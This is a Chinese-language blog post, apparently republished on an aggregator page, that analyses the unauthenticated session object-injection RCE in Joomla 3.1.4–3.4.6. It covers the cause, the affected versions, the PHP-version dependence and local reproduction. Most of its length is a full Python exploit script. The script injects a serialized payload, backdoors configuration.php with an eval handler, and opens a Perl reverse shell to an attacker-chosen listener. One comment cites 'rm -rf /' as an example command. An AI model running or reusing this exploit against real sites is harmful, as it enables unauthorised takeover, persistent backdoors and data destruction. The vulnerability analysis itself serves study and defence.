joomla 3.4.5 php版本,Joomla3.4.6漏洞最强总结
距離Joomla漏洞爆出已經(jīng)有一段時(shí)間了,網(wǎng)上資料也出來很多了,不過大多都是類似的,我這邊參考總結(jié)了一下,順便加了一點(diǎn)本地化復(fù)現(xiàn)和分析的干貨。
0x01漏洞介紹
Joomla是一套全球知名的內(nèi)容管理系統(tǒng),是使用PHP語(yǔ)言加上MySQL數(shù)據(jù)庫(kù)所開發(fā)的軟件系統(tǒng)。
漏洞本質(zhì)是Joomla對(duì)session數(shù)據(jù)處理不當(dāng),未經(jīng)授權(quán)的攻擊者可以發(fā)送精心構(gòu)造的惡意 HTTP 請(qǐng)求,獲取服務(wù)器權(quán)限,實(shí)現(xiàn)遠(yuǎn)程命令執(zhí)行。
0x02 影響范圍
本地復(fù)現(xiàn)實(shí)測(cè)3.1.4-3.4.6
0x03 漏洞原因分析
該漏洞是和Joomla的會(huì)話的運(yùn)作機(jī)制有關(guān),Joomla 會(huì)話以 PHP Objects 的形式存儲(chǔ)在數(shù)據(jù)庫(kù)中且由 PHP 會(huì)話函數(shù)處理,但是由于Mysql無(wú)法保存Null 字節(jié),函數(shù)在將session寫入數(shù)據(jù)庫(kù)和讀取時(shí)會(huì)對(duì)象因大小不正確而導(dǎo)致不合法從而溢出。因?yàn)槲凑J(rèn)證用戶的會(huì)話也可存儲(chǔ),所以該對(duì)象注入 (Object Injection) 可以在未登錄認(rèn)證的情況下攻擊成功,導(dǎo)致RCE。
當(dāng)我們?cè)?Joomla中執(zhí)行 POST 請(qǐng)求時(shí),通常會(huì)有303重定向?qū)⑽覀冎囟ㄏ蛑两Y(jié)果頁(yè)。這是利用的重要事項(xiàng),因?yàn)榈谝粋€(gè)請(qǐng)求(含參數(shù))將只會(huì)導(dǎo)致 Joomla 執(zhí)行動(dòng)作并存儲(chǔ)(例如調(diào)用write() 函數(shù))會(huì)話,之后303重定向?qū)⑦M(jìn)行檢索(如調(diào)用read() 函數(shù))并將信息顯示給用戶。
漏洞利用文件 ‘libraries/joomla/session/storage/database.php’中定義的函數(shù) read()和 write()由session_set_save_handler()設(shè)置,作為‘libraries/joomla/session/session.php:__start’ session_start() 調(diào)用的讀和寫處理程序。
由于Mysql無(wú)法保存Null 字節(jié),write函數(shù)在將數(shù)據(jù)存儲(chǔ)到數(shù)據(jù)庫(kù)之前(write函數(shù))會(huì)用‘\0\0\0’替換‘\x00\x2a\x00’(chr(0).’’.chr(0)),而在序列化對(duì)象中, $protected 變量被賦予‘\x00\x2a\x00’前綴。
當(dāng)讀取數(shù)據(jù)庫(kù)中的數(shù)據(jù)時(shí), read 函數(shù)會(huì)用‘\x00\x2a\x00’(NN)替換‘\0\0\0’,重構(gòu)原始對(duì)象。
這種替換的主要問題在于它用3個(gè)字節(jié)替換了6個(gè)字節(jié),之前所述,我們能夠通過動(dòng)作參數(shù)的讀取和寫入來操縱該會(huì)話對(duì)象進(jìn)行注入將被3個(gè)字節(jié)替換的‘\0\0\0’,導(dǎo)致對(duì)象因大小不正確(字節(jié)長(zhǎng)度不同)導(dǎo)致不合法,造成溢出。
實(shí)際中發(fā)送的特殊構(gòu)造(包括寫入webshell)的請(qǐng)求:
URL decode:
在本次曝光的Poc中就是用username字段進(jìn)行溢出,password字段進(jìn)行對(duì)象注入,如果插入任意serialize字符串,構(gòu)造反序列化漏洞了
0x04 漏洞影響范圍分析
我個(gè)人為了確定該漏洞的版本邊界值,寫了一個(gè)簡(jiǎn)單的批量利用腳本。
下方是批量利用的腳本測(cè)試的結(jié)果,很奇怪的是,該漏洞版本并沒有影響3.0.0-3.1.3,而是從3.1.4版本開始的。(黃色箭頭所示的【dacade】是我的shell密碼,我直接將shell密碼寫死了,懶得后面在菜刀連接的時(shí)候復(fù)制那段隨機(jī)生成碼費(fèi)事)
對(duì)于版本信息3.1.4-3.4.6的CMS,在執(zhí)行exp文件時(shí)都是可以正常getshell的,
3.1.4-3.4.6版本利用burp按步分析,對(duì)shell連接測(cè)試的時(shí)候沒問題。(fuck是我寫的echo字段,具體情況根據(jù)個(gè)人所寫代碼的不同而不同)
在3.1.4以下版本該步驟無(wú)法全部正常執(zhí)行,寫入shell失敗,經(jīng)過長(zhǎng)時(shí)間的追蹤發(fā)現(xiàn),是由于在發(fā)送特殊構(gòu)造(包括寫入webshell)的請(qǐng)求時(shí)步驟時(shí),無(wú)法file_put_contents寫入shell,
而在3.4.6版本以上,Joomla對(duì)于session信息進(jìn)行了編碼(base64)處理,所以無(wú)法觸發(fā)該漏洞。
同時(shí),該漏洞和php版本也有密切關(guān)系,因?yàn)楦甙姹镜腜HP版本(PHP>=5.6.13)對(duì)于seesion的處理方式發(fā)生了變化。
5.6.13版本以前是第一個(gè)變量解析錯(cuò)誤注銷第一個(gè)變量,然后解析第二個(gè)變量,但是5.6.13以后如果第一個(gè)變量錯(cuò)誤,直接銷毀整個(gè)session。
https://github.com/php/php-src/blob/PHP-5.6.13/ext/session/session.c
當(dāng)PHP版本為5.4.45時(shí),
可以getshell,
當(dāng)PHP版本為5.6.27時(shí)
無(wú)法getshell,
0x05 漏洞復(fù)現(xiàn)
本地環(huán)境:phpstudy [5.4.45-php+Apache+Mysql]
搭建過程:
將下載好的CMS解壓縮到網(wǎng)站目錄,然后進(jìn)入網(wǎng)頁(yè)端按照提示安裝即可。
檢測(cè)腳本的話網(wǎng)上單個(gè)的檢測(cè)腳本挺多的,你們隨便下載一個(gè)就行了,
逐步調(diào)試:
1、獲取目標(biāo)站點(diǎn)cookie
2、獲取目標(biāo)站點(diǎn)token
3、發(fā)送特殊構(gòu)造(包括寫入webshell)的請(qǐng)求
4、對(duì)shell進(jìn)行連接測(cè)試
可以正常getshell。
0x06 漏洞總結(jié)
該漏洞影響的范圍是很小的,原因在于:
1.Joomla后臺(tái)提供了一鍵升級(jí)功能,站長(zhǎng)的升級(jí)成本小并且方便。(你不升級(jí)它天天提示,估計(jì)強(qiáng)迫癥不想升級(jí)都升級(jí)了)
2.影響的版本范圍不大。
3.有一定的PHP版本要求。
PS:這個(gè)漏洞的批量腳本我就不單獨(dú)放出來了,要是有想要的歡迎贊賞一杯coffee獲取,不過單個(gè)的調(diào)試腳本還是有的。
單個(gè)調(diào)試腳本:
#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup
import sys
import string
import random
import argparse
from termcolor import colored
PROXS = {'http':'127.0.0.1:8080'}
PROXS = {}
def random_string(stringLength):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
backdoor_param = random_string(50)
def print_info(str):
print(colored("[*] " + str,"cyan"))
def print_ok(str):
print(colored("[+] "+ str,"green"))
def print_error(str):
print(colored("[-] "+ str,"red"))
def print_warning(str):
print(colored("[!!] " + str,"yellow"))
def get_token(url, cook):
token = ''
resp = requests.get(url, cookies=cook, proxies = PROXS)
html = BeautifulSoup(resp.text,'html.parser')
# csrf token is the last input
for v in html.find_all('input'):
csrf = v
csrf = csrf.get('name')
return csrf
def get_error(url, cook):
resp = requests.get(url, cookies = cook, proxies = PROXS)
if 'Failed to decode session object' in resp.text:
#print(resp.text)
return False
#print(resp.text)
return True
def get_cook(url):
resp = requests.get(url, proxies=PROXS)
#print(resp.cookies)
return resp.cookies
def gen_pay(function, command):
# Generate the payload for call_user_func('FUNCTION','COMMAND')
template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
#payload = command + ' || $a=\'http://wtf\';'
payload = 'http://l4m3rz.l337/;' + command
# Following payload will append an eval() at the enabled of the configuration file
#payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'test\\\'])) eval($_POST[\\\'test\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
function_len = len(function)
final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
return final
def make_req(url , object_payload):
# just make a req with object
print_info('Getting Session Cookie ..')
cook = get_cook(url)
print_info('Getting CSRF Token ..')
csrf = get_token( url, cook)
user_payload = '\\0\\0\\0' * 9
padding = 'AAA' # It will land at this padding
working_test_obj = 's:1:"A":O:18:"PHPObjectInjection":1:{s:6:"inject";s:10:"phpinfo();";}'
clean_object = 'A";s:5:"field";s:10:"AAAAABBBBB' # working good without bad effects
inj_object = '";'
inj_object += object_payload
inj_object += 's:6:"return";s:102:' # end the object with the 'return' part
password_payload = padding + inj_object
params = {
'username': user_payload,
'password': password_payload,
'option':'com_users',
'task':'user.login',
csrf :'1'
}
print_info('Sending request ..')
resp = requests.post(url, proxies = PROXS, cookies = cook,data=params)
return resp.text
def get_backdoor_pay():
# This payload will backdoor the the configuration .PHP with an eval on POST request
function = 'assert'
template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
# payload = command + ' || $a=\'http://wtf\';'
# Following payload will append an eval() at the enabled of the configuration file
payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'' + backdoor_param +'\\\'])) eval($_POST[\\\''+backdoor_param+'\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
function_len = len(function)
final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
return final
def check(url):
check_string = random_string(20)
target_url = url + 'index.php/component/users'
html = make_req(url, gen_pay('print_r',check_string))
if check_string in html:
return True
else:
return False
def ping_backdoor(url,param_name):
res = requests.post(url + '/configuration.php', data={param_name:'echo \'PWNED\';'}, proxies = PROXS)
if 'PWNED' in res.text:
return True
return False
def execute_backdoor(url, payload_code):
# Execute PHP code from the backdoor
res = requests.post(url + '/configuration.php', data={backdoor_param:payload_code}, proxies = PROXS)
print(res.text)
def exploit(url, lhost, lport):
# Exploit the target
# Default exploitation will append en eval function at the end of the configuration.pphp
# as a bacdoor. btq if you do not want this use the funcction get_pay('php_function','parameters')
# e.g. get_payload('system','rm -rf /')
# First check that the backdoor has not been already implanted
target_url = url + 'index.php/component/users'
make_req(target_url, get_backdoor_pay())
if ping_backdoor(url, backdoor_param):
print_ok('Backdoor implanted, eval your code at ' + url + '/configuration.php in a POST with ' + backdoor_param)
print_info('Now it\'s time to reverse, trying with a system + perl')
execute_backdoor(url, 'system(\'perl -e \\\'use Socket;$i="'+ lhost +'";$p='+ str(lport) +';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\\\'\');')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-t','--target',required=True,help='Joomla Target')
parser.add_argument('-c','--check', default=False, action='store_true', required=False,help='Check only')
parser.add_argument('-e','--exploit',default=False,action='store_true',help='Check and exploit')
parser.add_argument('-l','--lhost', required='--exploit' in sys.argv, help='Listener IP')
parser.add_argument('-p','--lport', required='--exploit' in sys.argv, help='Listener port')
args = vars(parser.parse_args())
url = args['target']
if(check(url)):
print_ok('Vulnerable')
if args['exploit']:
exploit(url, args['lhost'], args['lport'])
else:
print_info('Use --exploit to exploit it')
else:
print_error('Seems NOT Vulnerable ;/')
參考:
總結(jié)
以上是生活随笔為你收集整理的joomla 3.4.5 php版本,Joomla3.4.6漏洞最强总结的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: oracle 创建表空间 pcincre
- 下一篇: 网游服务端php5.1时间戳格式化,ph